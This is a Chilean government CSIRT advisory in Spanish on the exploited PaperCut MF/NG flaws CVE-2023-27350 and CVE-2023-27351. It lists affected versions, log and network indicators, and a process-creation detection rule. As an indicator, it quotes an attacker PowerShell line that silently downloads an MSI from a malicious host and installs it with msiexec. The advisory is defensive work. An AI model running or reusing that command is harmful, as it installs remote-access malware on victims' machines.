4 mayo, 2023

Comunicado de Seguridad Cibernética | Explotación de vulnerabilidad día cero PaperCut

Puede encontrar este comunicado en formato PDF aquí: 10CND23-00099-01

El Equipo de Respuesta ante Incidentes de Seguridad Informática del Gobierno de Chile, CSIRT de Gobierno, informa de una vulnerabilidad de día cero en el sistema de gestión de fotocopia e impresión en línea PaperCut MF/NG.

Las siguientes son las vulnerabilidades involucradas en el incidente, las que fueron clasificadas con gravedad crítica una y alta la otra:

§  CVE-2023–27350[1] / ZDI-CAN-18987 (Vulnerabilidad de ejecución remota de código)[CVSS[2] v3: 9.8 CRITICAL]

§  CVE-2023–27351[3] / ZDI-CAN-19226 (Vulnerabilidad de datos de cuenta de usuario) )[CVSS v3: 7.5 HIGH]

De acuerdo con lo señalado por el proveedor, las siguientes son las versiones afectadas del producto:

CVE-2023–27350 / ZDI-CAN-18987 CVE-2023–27351 / ZDI-CAN-19226
Versiones afectadas/vulnerables PaperCut  MF o NG versión 8.0 o posterior (excluyendo las versiones parcheadas):

§  versión 8.0.0 a 19.2.7 (inclusive)

§  versión 20.0.0 a 20.1.6 (inclusive)

§  versión 21.0.0 a 21.2.10 (inclusive)

§  versión 22.0.0 a 22.0.8 (inclusive)

PaperCut MF o NG versión 15.0 o posterior (excluyendo versiones parcheadas):

§  versión 15.0.0 a 19.2.7 (inclusive)

§  versión 20.0.0 a 20.1.6 (inclusive)

§  versión 21.0.0 a 21.2.10 (inclusive)

§  versión 22.0.0 a 22.0.8 (inclusive)

Componentes afectados §  Los servidores de aplicaciones se ven afectados

§  Los servidores de sitios se ven afectados

§  Los servidores de aplicaciones se ven afectados

Los administradores de sistemas deben estar atentos a las siguientes condiciones:

§  Cualquier actividad sospechosa o alertas de seguridad en las herramientas de antivirus, antimalware y de seguridad de punto final.

§  Cualquier entrada sospechosa en el registro de aplicación PaperCut MF, como:

·       El usuario «admin» inicia sesión en la interfaz de administración

·       El usuario «admin» modificó el script de impresión en la impresora

·       El usuario «admin» actualizó la clave de configuración «…»

·       El usuario “[setup-wizard]” modificó una clave de configuración

·       Si los registros del servidor de su servidor de aplicaciones están en modo de depuración, verifique si hay líneas que mencionen SetupCompleteda la vez que no se correlacionen con la instalación o actualización del servidor.

§  A Dominios en DNS o registro web proxy:

·       upd488[.]windowservicecemter[.]com/download/ld.txt

·       upd488[.]windowservicecemter[.]com/download/AppPrint.msi

·       upd488[.]windowservicecemter[.]com/download/a2.msi

·       upd488[.]windowservicecemter[.]com/download/a3.msi

·       anydeskupdate[.]com

·       anydeskupdates[.]com

·       netviewremote[.]com

·       updateservicecenter[.]com

·       windowcsupdates[.]com

·       windowservicecentar[.]com

·       windowservicecenter[.]com

·       winserverupdates[.]com

·       study[.]abroad[.]ge

·       ber6vjyb[.]com

·       5[.]188[.]206[.]14

    • upd488[.]windowservicecemter[.]com/download/update.dll

§  Nuevas entradas sospechosas en el archivo de claves autorizado por SSH.

§  Nuevos scripts de impresión en la configuración.

§  SHA256 hash de archivos en el sistema local

§  Powershell Scripts con contenido similar a:

cmd /c “powershell.exe -nop -w hidden

Invoke-WebRequest ‘hXXp://upd488[.]windowservicecemter[.]com/download/setup.msi’

-OutFile ‘setup.msi’ ”

cmd /c “msiexec /i setup.msi /qn   IntegratorLogin =fimaribahundqf[AT]gmx[.]com CompanyId =1”\\@@

§  Detección vía Regla YARA en SIEM:

title: PaperCut MF/NG Vulnerability

authors: Huntress DE&TH Team

description: Detects suspicious code execution from vulnerable PaperCut versions MF and NG

logsource:

category: process_creation

product: windows

detection:

selection:

ParentImage|endswith: “\\pc-app.exe”

Image|endswith:

– “\\cmd.exe”

– “\\powershell.exe”

condition: selection

level: high

falsepositives:

– Expected admin activity

Ante el eventual compromiso producto de la explotación de esta vulnerabilidad, se recomienda mantener copias del servidor, limpiar el servidor de aplicaciones, reconstruir el servidor de aplicaciones y restaurar la base de datos.

Para la implementación de los parches de seguridad y medidas preventivas, solicitamos revisar las recomendaciones del CSIRT de Gobierno en el siguiente enlace:

§  https://csirt.gob.cl/recomendaciones-gestion-de-informacion/

Para mayores consultas, recordamos a todas las organizaciones que pueden comunicarse con el CSIRT de gobierno al correo soc@interior.gob.cl o al teléfono 1510, ambos disponibles en modalidad 7/24, y también pueden obtener recursos de concientización en nuestro sitio web: https://csirt.gob.cl/

 Reporte del fabricante:

§  https://www.papercut.com/kb/Main/PO-1216-and-PO-1219

[1] https://nvd.nist.gov/vuln/detail/CVE-2023-27350

[2] https://nvd.nist.gov/vuln-metrics/cvss

[3] https://nvd.nist.gov/vuln/detail/CVE-2023-27351

Comunicado de Seguridad Cibernética | Explotación de vulnerabilidad día cero PaperCut